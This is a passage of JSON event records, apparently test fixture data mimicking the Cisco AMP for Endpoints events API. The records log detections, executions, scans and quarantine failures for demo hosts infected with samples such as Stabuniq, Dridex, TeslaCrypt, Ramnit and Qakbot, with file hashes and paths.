Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984838","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":39000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659221956984837","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jqs.exe","file_path":"\\\\?\\C:\\Program Files\\7-Zip\\Update\\jqs.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1960,"disposition":"Clean","file_name":"IEXPLORE.EXE","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659221956985000,"timestamp":1610704810,"timestamp_nanoseconds":7000000,"date":"2021-01-15T10:00:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017540","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659217662018000,"timestamp":1610704809,"timestamp_nanoseconds":867000000,"date":"2021-01-15T10:00:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659217662017539","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899966001000,"timestamp":1610704801,"timestamp_nanoseconds":966000000,"date":"2021-01-15T10:00:01+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.GenericKD:N.18fd.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704801,"start_date":"2021-01-15T10:00:01+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a"},"parent":{"disposition":"Clean","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395844000300,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.Variant:Stabuniq.15nx.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704800,"start_date":"2021-01-15T10:00:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156207750431900000,"timestamp":1610704800,"timestamp_nanoseconds":672000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156207750431899653","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":445000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311874","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No 
Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede